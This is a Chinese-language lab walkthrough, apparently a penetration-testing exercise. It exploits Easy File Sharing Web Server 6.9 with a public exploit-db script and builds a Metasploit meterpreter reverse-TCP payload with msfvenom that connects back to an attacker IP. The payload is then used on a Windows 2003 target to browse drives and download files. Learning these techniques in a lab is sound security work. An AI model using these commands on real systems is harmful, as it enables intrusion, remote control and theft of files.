1、靶机(Window)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。
打开软件
将80端口的URL改成靶机的IP
再用kali扫描主机端口,指令如下: nmap -sV 目标IP
可以看到,靶机正在运行Easy file sharing Web Server httpd,版本为6.9
接着,输入指令
searchsploit easy file sharing
查找该服务的相关漏洞
再输入指令:python2 /usr/share/exploitdb/exploits/windows/remote/39009.py IP 80
目标靶机服务已经崩溃,并且弹出了一个计算器
2.Metasploity应用
系统:kali-linux windows 2003
生成被控端
以前旧版本的 Metasploit中提供了两条关于远程控制被控端程序的命令,其中msfpayload负责用来生成攻击载荷,msfencode负责对攻击载荷进行编码。新版本的Metasploit中将这两条命令整合成为了msfvenom命令,下面给出了msfvenom的几个常见的使用参数。
-p,--payload<payload>指定要生成的 payload (攻击荷载)。
“f,--format<format>指定输出格式(可以使用--help-formats来获取msf支持的输出格式列表)
-o,--out<path>指定存储 payload的位置
在kali终端输入生成攻击荷载指令(IP对应攻击者IP,lport对应要开的端口):
msfvenom -p windows/meterpreter/reverse_tcp lhost=IP lport=5000 exe -o /root/payload.exe
生成的被控端文件如图
如果我们让这个文件在某一台计算机(靶机)上执行的话,那么这台计算机就会立刻回连到攻击者IP上,但是我们这时还没有一个主控端,所以我们需要启动一个远程控制文件的主控端。这个主控端需要在 Metasploit中启动。
生成主控端:首先启动msfconsole
输入完4个msf6对应指令后,在Windows2003打开payload(被控端),结果如图
输入show_mount可以查看各磁盘情况
输入 download D:\guestbook 下载文件
文件下载成功